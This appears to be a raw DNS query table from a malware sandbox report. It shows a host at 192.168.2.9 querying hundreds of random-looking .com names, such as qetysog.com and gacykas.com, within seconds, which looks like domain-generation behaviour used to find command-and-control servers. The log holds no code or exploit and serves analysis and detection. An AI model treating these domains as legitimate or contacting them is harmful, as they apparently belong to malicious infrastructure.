                                                                                                                                                                                                            Nov 11, 2024 18:07:58.413849115 CET192.168.2.91.1.1.10xa15fStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.414030075 CET192.168.2.91.1.1.10x63d2Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.417421103 CET192.168.2.91.1.1.10x8b14Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.417675972 CET192.168.2.91.1.1.10x6023Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.418086052 CET192.168.2.91.1.1.10x9b08Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.418252945 CET192.168.2.91.1.1.10xda9aStandard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.418649912 CET192.168.2.91.1.1.10x9b78Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419029951 CET192.168.2.91.1.1.10x3680Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419234037 CET192.168.2.91.1.1.10xd822Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419661999 CET192.168.2.91.1.1.10x774dStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.419841051 CET192.168.2.91.1.1.10x6ea0Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.420139074 CET192.168.2.91.1.1.10xb434Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.420382977 CET192.168.2.91.1.1.10xfa5cStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.437679052 CET192.168.2.91.1.1.10xfac7Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.439383984 CET192.168.2.91.1.1.10x9fadStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.441468954 CET192.168.2.91.1.1.10x2fc9Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.442234993 CET192.168.2.91.1.1.10xdfe4Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.442511082 CET192.168.2.91.1.1.10x1ca1Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.444205999 CET192.168.2.91.1.1.10xd07bStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.444431067 CET192.168.2.91.1.1.10x2fa3Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.446151018 CET192.168.2.91.1.1.10x948aStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.446197033 CET192.168.2.91.1.1.10x65ebStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.448555946 CET192.168.2.91.1.1.10x5117Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.448947906 CET192.168.2.91.1.1.10xa0b4Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.471236944 CET192.168.2.91.1.1.10xc336Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.471453905 CET192.168.2.91.1.1.10x4a6dStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.486885071 CET192.168.2.91.1.1.10xd355Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.558743954 CET192.168.2.91.1.1.10x25c2Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.564609051 CET192.168.2.91.1.1.10xc58fStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.566030979 CET192.168.2.91.1.1.10xb39eStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.567209959 CET192.168.2.91.1.1.10xf58cStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.598475933 CET192.168.2.91.1.1.10xf5c1Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.612736940 CET192.168.2.91.1.1.10xdbaaStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.646879911 CET192.168.2.91.1.1.10xea23Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.647578955 CET192.168.2.91.1.1.10x3f3cStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.647910118 CET192.168.2.91.1.1.10xfd81Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.649194002 CET192.168.2.91.1.1.10x9a97Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.980536938 CET192.168.2.91.1.1.10x9de9Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.988436937 CET192.168.2.91.1.1.10xb5b9Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.991930962 CET192.168.2.91.1.1.10x3fdbStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.995116949 CET192.168.2.91.1.1.10xb5c5Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997525930 CET192.168.2.91.1.1.10x2fc2Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997734070 CET192.168.2.91.1.1.10xe5beStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997734070 CET192.168.2.91.1.1.10xdc90Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998266935 CET192.168.2.91.1.1.10x63fStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998307943 CET192.168.2.91.1.1.10x3ce9Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998806953 CET192.168.2.91.1.1.10x3690Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999105930 CET192.168.2.91.1.1.10x56b4Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999368906 CET192.168.2.91.1.1.10x9a23Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999782085 CET192.168.2.91.1.1.10x63f3Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.000050068 CET192.168.2.91.1.1.10x3c1aStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.004659891 CET192.168.2.91.1.1.10x4ec3Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.005060911 CET192.168.2.91.1.1.10x866bStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.005781889 CET192.168.2.91.1.1.10xa970Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.007998943 CET192.168.2.91.1.1.10x3bebStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.008857012 CET192.168.2.91.1.1.10xe2c9Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.013504028 CET192.168.2.91.1.1.10x30d2Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.026727915 CET192.168.2.91.1.1.10xf53bStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027327061 CET192.168.2.91.1.1.10x58c6Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027520895 CET192.168.2.91.1.1.10xbca4Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027674913 CET192.168.2.91.1.1.10xcf5bStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027993917 CET192.168.2.91.1.1.10x75f3Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028240919 CET192.168.2.91.1.1.10xeec2Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028704882 CET192.168.2.91.1.1.10xa3cStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028896093 CET192.168.2.91.1.1.10xad46Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.029350996 CET192.168.2.91.1.1.10xc50bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.035470963 CET192.168.2.91.1.1.10x1594Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.035686970 CET192.168.2.91.1.1.10x7adeStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.036482096 CET192.168.2.91.1.1.10xe76dStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.037823915 CET192.168.2.91.1.1.10x3dfcStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.037977934 CET192.168.2.91.1.1.10xe9fbStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.040560961 CET192.168.2.91.1.1.10x8e00Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.043531895 CET192.168.2.91.1.1.10x168aStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.043706894 CET192.168.2.91.1.1.10x42dStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.050177097 CET192.168.2.91.1.1.10x8ba9Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.054162025 CET192.168.2.91.1.1.10xbaedStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.059351921 CET192.168.2.91.1.1.10x4e69Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.065299988 CET192.168.2.91.1.1.10x453fStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.065815926 CET192.168.2.91.1.1.10xb569Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.066787958 CET192.168.2.91.1.1.10xc3a0Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.066883087 CET192.168.2.91.1.1.10xc3d7Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.072500944 CET192.168.2.91.1.1.10x4b83Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.075186014 CET192.168.2.91.1.1.10x63b0Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.075349092 CET192.168.2.91.1.1.10x420eStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.077470064 CET192.168.2.91.1.1.10xb56fStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.077919006 CET192.168.2.91.1.1.10xedd0Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.078843117 CET192.168.2.91.1.1.10x5c90Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.085432053 CET192.168.2.91.1.1.10x3796Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.085624933 CET192.168.2.91.1.1.10x14a5Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.089590073 CET192.168.2.91.1.1.10x8028Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.129842997 CET192.168.2.91.1.1.10xd608Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.134964943 CET192.168.2.91.1.1.10x3f23Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.135188103 CET192.168.2.91.1.1.10x4d8eStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.136487961 CET192.168.2.91.1.1.10x4b82Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.141277075 CET192.168.2.91.1.1.10x1ff2Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.165546894 CET192.168.2.91.1.1.10xddf7Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.167155027 CET192.168.2.91.1.1.10x8be0Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.167707920 CET192.168.2.91.1.1.10x2798Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.168270111 CET192.168.2.91.1.1.10x5b8cStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.178425074 CET192.168.2.91.1.1.10xb8e9Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.178715944 CET192.168.2.91.1.1.10x97deStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.639460087 CET192.168.2.91.1.1.10x37dfStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.639816046 CET192.168.2.91.1.1.10x2e9fStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.642824888 CET192.168.2.91.1.1.10xda17Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.647330046 CET192.168.2.91.1.1.10xc62Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.650291920 CET192.168.2.91.1.1.10xeb98Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.652760029 CET192.168.2.91.1.1.10xc8d0Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.655106068 CET192.168.2.91.1.1.10x7207Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.655755043 CET192.168.2.91.1.1.10x8870Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.655824900 CET192.168.2.91.1.1.10xc85dStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.656708956 CET192.168.2.91.1.1.10xa1dfStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.656737089 CET192.168.2.91.1.1.10x20a2Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.657340050 CET192.168.2.91.1.1.10x322aStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.658195972 CET192.168.2.91.1.1.10x9465Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.658236027 CET192.168.2.91.1.1.10xd19eStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.658862114 CET192.168.2.91.1.1.10x1be3Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.659174919 CET192.168.2.91.1.1.10x4865Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.659755945 CET192.168.2.91.1.1.10x27d9Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.659977913 CET192.168.2.91.1.1.10x16e3Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.660520077 CET192.168.2.91.1.1.10x92c3Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.661243916 CET192.168.2.91.1.1.10x72cStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.661602020 CET192.168.2.91.1.1.10x3d98Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.662008047 CET192.168.2.91.1.1.10x8fa7Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.662529945 CET192.168.2.91.1.1.10x1f8Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.663924932 CET192.168.2.91.1.1.10x65beStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.666090965 CET192.168.2.91.1.1.10x2b23Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.670798063 CET192.168.2.91.1.1.10x2d3aStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.673811913 CET192.168.2.91.1.1.10xa22Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.674715042 CET192.168.2.91.1.1.10x9d46Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.675276041 CET192.168.2.91.1.1.10x34c6Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.675735950 CET192.168.2.91.1.1.10x715cStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.676110029 CET192.168.2.91.1.1.10xc84aStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.677476883 CET192.168.2.91.1.1.10x558aStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.677819014 CET192.168.2.91.1.1.10x7217Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.678886890 CET192.168.2.91.1.1.10xe9ecStandard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.679301023 CET192.168.2.91.1.1.10x7a60Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.679867983 CET192.168.2.91.1.1.10x2f2eStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.680717945 CET192.168.2.91.1.1.10xcb7dStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.684350967 CET192.168.2.91.1.1.10xec23Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.685451031 CET192.168.2.91.1.1.10x6c26Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.693331003 CET192.168.2.91.1.1.10xb41Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.694076061 CET192.168.2.91.1.1.10x4351Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.694628000 CET192.168.2.91.1.1.10xda16Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.695096016 CET192.168.2.91.1.1.10x6069Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.695420027 CET192.168.2.91.1.1.10x1e71Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.697845936 CET192.168.2.91.1.1.10x39e3Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.712641001 CET192.168.2.91.1.1.10xc27bStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.713835001 CET192.168.2.91.1.1.10x6c9cStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.715519905 CET192.168.2.91.1.1.10x8433Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.722392082 CET192.168.2.91.1.1.10x40a8Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.740509033 CET192.168.2.91.1.1.10xa60aStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.740858078 CET192.168.2.91.1.1.10xf60bStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.741764069 CET192.168.2.91.1.1.10x6974Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742042065 CET192.168.2.91.1.1.10x1382Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742429018 CET192.168.2.91.1.1.10xf9b6Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742445946 CET192.168.2.91.1.1.10xe607Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742686987 CET192.168.2.91.1.1.10x753fStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742830038 CET192.168.2.91.1.1.10x2e1eStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.742968082 CET192.168.2.91.1.1.10xd808Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.743145943 CET192.168.2.91.1.1.10x35d0Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.743464947 CET192.168.2.91.1.1.10x1d74Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.743722916 CET192.168.2.91.1.1.10xd99aStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.750452995 CET192.168.2.91.1.1.10xb355Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.750734091 CET192.168.2.91.1.1.10xf555Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.761774063 CET192.168.2.91.1.1.10xcc06Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.765270948 CET192.168.2.91.1.1.10x6662Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.775954962 CET192.168.2.91.1.1.10x2627Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.776354074 CET192.168.2.91.1.1.10x1614Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.782706022 CET192.168.2.91.1.1.10xc23eStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.783401012 CET192.168.2.91.1.1.10xdf3eStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.784179926 CET192.168.2.91.1.1.10x5d56Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.784413099 CET192.168.2.91.1.1.10x9dddStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.784755945 CET192.168.2.91.1.1.10xe406Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.788235903 CET192.168.2.91.1.1.10x7fbbStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.788450003 CET192.168.2.91.1.1.10xb199Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.788830996 CET192.168.2.91.1.1.10x30c5Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.789109945 CET192.168.2.91.1.1.10x8ecaStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.789700031 CET192.168.2.91.1.1.10x2208Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.789916992 CET192.168.2.91.1.1.10x6511Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.790281057 CET192.168.2.91.1.1.10x2de9Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.790533066 CET192.168.2.91.1.1.10x7687Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801002979 CET192.168.2.91.1.1.10xa767Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.801070929 CET192.168.2.91.1.1.10xc5eStandard query (0)lygygin.comA (IP address)IN (0x0001)false
